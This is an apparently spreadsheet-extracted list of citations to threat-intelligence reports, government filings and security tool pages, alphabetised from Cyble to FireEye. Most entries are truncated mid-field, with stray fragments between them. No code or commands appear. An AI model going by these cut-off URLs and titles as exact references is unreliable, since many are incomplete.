Cyble Side Cyble. (202https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/
Cybleinc C Cybleinc. ( https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizatio
Cycraft Ch Cycraft. ( https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf
Cylance Cl Cylance. ( https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/
Cylance DuGross, J. ( https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/res
Cylance M The Cylanchttps://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html
Cylance ShLivelli, K, https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-libra
Cylance ShCylance SPEhttps://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar
Cylance Sod Cylance. (2https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html
CymmetriaCymmetria.https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/p
Cynet RagnGold, B. (2 https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/
Cyphort EvMarschalekhttps://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumen
Cyphort EvMarschalekhttps://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumen
Cyware NgCyware. (20https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-syste
DBAPPSecur JinQuan, Mahttps://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-b
DFIR Conti DFIR Reporhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/
DFIR Phos DFIR Reporhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/
DFIR ReporDFIR Report https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell
DFIR Ryuk The DFIR Rhttps://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
DFIR Ryuk The DFIR Re https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
DFIR Ryuk'The DFIR Re https://thedfirreport.com/2020/10/08/ryuks-return/
DFIR_Qua DFIR. (202 https://thedfirreport.com/2022/04/25/quantum-ransomware/
DFIR_Sodi DFIR. (2021https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
DHS CISA FBI, CISA, https://www.cisa.gov/uscert/ncas/alerts/aa22-055a
DHS/CISA RDHS/CISA. https://us-cert.cisa.gov/ncas/alerts/aa20-302a
DNS-msft Microsoft. https://learn.microsoft.com/en-us/windows-server/networking/dns/deploy/dns-policies-overview
DOJ APT10United Stathttps://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global
DOJ FIN7 ADepartment https://www.justice.gov/opa/press-release/file/1084361/download
DOJ GRU InMueller, R.https://www.justice.gov/file/1080281/download
DOJ Iran I DOJ. (2018,https://www.justice.gov/usao-sdny/press-release/file/1045781/download
Dark VorteDark Vortehttps://bruteratel.com/
DarkReadinHiggins, K. https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1
Debian nbtBezroutchkhttps://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html
Deep Insti Shaul Vilk https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
Deep Insti Vilkomir-P https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence
Deep Insti Vilkomir-Prhttps://www.deepinstinct.com/blog/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-p
Default VBKellie Eick https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-
Dell DridexDell Securehttps://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
Dell Later Carvey, H. http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-ex
Dell P2P Z SecureWork https://www.secureworks.com/research/The-Lifecycle-of-Peer-to-Peer-Gameover-ZeuS
Dell SakulaDell Securehttp://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/
Dell Skelet Dell Securehttps://www.secureworks.com/research/skeleton-key-malware-analysis
Dell TG-13 Dell Securehttp://www.secureworks.com/resources/blog/living-off-the-land/
Dell TG-33 Dell Securehttps://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
Dell Threa Dell Securehttp://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-cre
Dell WiperDell Secur http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korea
Delpy MimiDelpy, B. https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
Demaske Ne Demaske, M https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshel
Deply MimiDeply, B. ( https://github.com/gentilkiwi/mimikatz
DigiTrust AThe DigiTruhttps://www.digitrustgroup.com/agent-tesla-keylogger/
DigiTrust The DigiTr https://www.digitrustgroup.com/nanocore-not-your-average-rat/
DingledineRoger Dinghttp://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf
Directory SGrafnetter https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/
District C US District https://www.justice.gov/opa/page/file/1122671/download
Docker DaeDocker. (n https://docs.docker.com/engine/security/protect-access/
DomainTool Chad Anderhttps://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs/
Donut GithTheWover.https://github.com/TheWover/donut
Dormann DDormann, W https://insights.sei.cmu.edu/cert/2019/09/the-dangers-of-vhd-and-vhdx-files.html
Dragos CraDragos Inc.https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
Dragos CraJoe Slowik https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
Dragos EK Dragos. (2 https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/
Dragos He Dragos. (n.https://dragos.com/resource/hexane/
Dragos PARDragos. (n.https://www.dragos.com/threat/parisite/
Dragos ThrDragos. (n.https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hs
DustySky ClearSky. ( https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf
EFF Manul Galperin, Ehttps://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf
ESEST BlacCherepanov, http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-n
ESET Attor Hromcova,https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf
ESET BackdAdam Burgh https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/
ESET Bad RM.Léveille,https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
M-E.. (2017, October 24). Bad Rabbit: Not ‑Petya is back with improved ransomware. Retrieved January
ESET BlackCherepanov, https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-n
ESET BuhtrESET Resear https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/
ESET Cadd ESET. (202 https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine
ESET CarbeMatrosov, https://www.eset.com/fileadmin/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.p
A
ESET CarboESET. (201 https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
ESET CasbaESET Resear https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/
ESET ComRFaou, M. ( https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
ESET CrutcFaou, M. ( https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/
ESET Dazzl M.Léveillé,https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-as
ESET DukesFaou, M., https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
ESET EburyM.Léveillé,https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
ESET EburyMarc-Etienn https://web-assets.esetstatic.com/wls/en/papers/white-papers/ebury-is-alive-but-unseen.pdf
ESET EburyVachon, F. https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/
ESET EmotePerez, D.. https://www.welivesecurity.com/2018/12/28/analysis-latest-emotet-propagation-campaign/
ESET Evasi Facundo Muñ https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chine
ESET Evasi Ahn Ho, Fachttps://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibe
ESET EvilN Porolli, M. https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
ESET ExchaFaou, M., Thttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
ESET ForS Dumont, R.https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.p
ESET GamaBoutin, J. https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
ESET GazerESET. (2017https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
ESET GelseDupuy, T. https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf
ESET GrandESET. (202 https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/
ESET GreyECherepanov https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf
ESET Herme ESET. (202 https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine
ESET Herme ESET. (202 https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine
ESET IIS M Hromcová,https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf
ESET IndusAnton Cherhttps://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
ESET Invis Hromcová,https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/
Z
ESET Invis Hromcova,https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
ESET KobalM.Leveille,https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computin
ESET KobalM.Leveille,https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf
ESET LazarBreitenbachttps://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf
ESET LazaruKálnai, P., https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/
ESET Light Faou, M. ( https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
ESET LoJaxESET. (2018https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf
ESET LoudM Malik, M. (https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/
ESET Mache ESET. (201 https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
ESET NomaCherepanov https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf
ESET OceanFoltýn, T. https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
ESET OceanDumont, R.https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
ESET OceanDumont, R.https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/
ESET Okrum Hromcova,https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
ESET OperaCherepanov, http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf
ESET OperaM. Porolli. https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/
ESET PLEADCherepanov, https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malw
A.. (2018, July 9). Certificates stolen from Taiwanese tech ‑companies misused in Plead malware camp
ESET Pipe Tartare, M.https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
ESET RTM Faou, M. a https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
ESET ReconBoutin, J. https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf
ESET SecurESET Securhttps://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/
ESET SednitESET. (201 https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
ESET SednitESET Reseahttp://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/
ESET SednitESET. (2016http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf
ESET SednitESET. (201 http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
ESET SednitESET. (201 http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
ESET SedniCalvet, J. http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/
ESET T3 ThESET. (202 https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf
ESET TeleBCherepanov, https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/
ESET TelebCherepanov, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
ESET TelebCherepanov, https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
ESET TelebCherepanov, https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
ESET Trick Boutin, J. https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/
ESET Turla Jurčacko, Fhttps://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/
ESET Turla ESET, et al https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf
ESET Turla ESET Resear https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/
ESET Turla Faou, M. anhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
ESET Twitt Cherepanov https://x.com/ESETresearch/status/1458438155149922312
ESET WindiBilodeau, O., https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-
Bureau, M., Calvet, J., Dorais-Joncas, A., Léveillé, M., Vanheuverzwijn, B. (2014, March 18). Operation
ESET WinteMatthieu Fa https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundc
ESET ZebroESET Resear https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
ESET ZebroESET. (201 https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/
EST KimsukAlyac. (201https://blog.alyac.co.kr/2234
Eclypsium Eclypsium, https://eclypsium.com/wp-content/uploads/2020/12/TrickBot-Now-Offers-TrickBoot-Persist-Brick-Profit
Elastic La Stepanic, https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus
Elastic Pik Daniel Stephttps://www.elastic.co/security-labs/pikabot-i-choose-you
Elastic Pro Hosseini, Ahttps://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-com
Electron SeStack Overfhttps://stackoverflow.com/questions/48854265/why-do-i-see-an-electron-security-warning-after-updati
Electron SeCertiK. (20 https://medium.com/certik/vulnerability-in-electron-based-application-unintentionally-giving-malicious-
Emissary TFalcone, R.http://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-b
Emotet DepCybereasonhttps://www.cybereason.com/blog/research/triple-threat-emotet-deploys-trickbot-to-steal-data-spread
EnableMPRN Microsoft. https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowslogon
Enigma RevNelson, M.https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
Ensilo Dar Adi Zeligs https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ran
Eset Rams Sanmillan, https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/
I.. (2020, May 13). Ramsay: A cyber ‑espionage toolkit tailored for air ‑gapped networks. Retrieved May 2
Evi1cg ForfEvi1cg. (20https://x.com/Evi1cg/status/935027922397573120
Evilginx 2 Gretzky, K. https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/
ExecutableStefan Kanthttps://seclists.org/fulldisclosure/2015/Dec/34
Expel IO EvA. Randazzo https://expel.io/blog/finding-evil-in-aws/
F-Secure BF-Secure L https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
F-Secure CF-Secure Lahttps://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf
F-Secure CF-Secure Lahttps://www.f-secure.com/documents/996508/1030745/CozyDuke
F-Secure L F-Secure Lahttps://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf
F-Secure S F-Secure. https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/
F-Secure T F-Secure L https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
FBI FLASH FBI. (2020 https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf
FBI Flash The Record.https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomwa
FBI RagnarFBI. (2020 https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-r
FOX-IT Ma Yonathan Klhttps://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf
FRP GitHubfatedier. ( https://github.com/fatedier/frp
FSI AndarieFSI. (2017, https://fsiceat.tistory.com/2
FSecure LoKazem, M. https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml
Fidelis Hi-ZFidelis Thr https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/
Fidelis IN Fidelis Cy https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf
Fidelis Tri Reaves, J. https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre
Fidelis Tur Fidelis Cyb https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign
Fidelis njR Fidelis Cyb https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf
FinFisher CFinFisher. https://web.archive.org/web/20171222050934/http://www.finfisher.com/FinFisher/index.html
FinFisher eMicrosoft Dhttps://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeatin
FireEye ADBierstock, https://www.troopers.de/troopers19/agenda/fpxwmn/
FireEye APFireEye iSI https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
FireEye APMatsuda, Ahttps://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-u
FireEye APFireEye Labhttps://web.archive.org/web/20240119213200/https://www2.fireeye.com/rs/fireye/images/APT17_Rep
FireEye APAhl, I. (20 https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html
FireEye APFireEye. ( https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/g
FireEye APSmith, L. a https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html
FireEye APFireEye La https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
FireEye APDunwoody,https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
FireEye APDunwoody,https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of
FireEye APFireEye La https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf
FireEye APHenderson,https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-
FireEye APCarr, N.. ( https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
FireEye APAckerman,https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive
G
FireEye APO'Leary, J. https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.ht
FireEye APDavis, S. a https://www.brighttalk.com/webcast/10703/275683
FireEye APSardiwal, https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
FireEye APBromiley, M https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-p
FireEye APDavis, S. https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east
FireEye APMandiant. https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
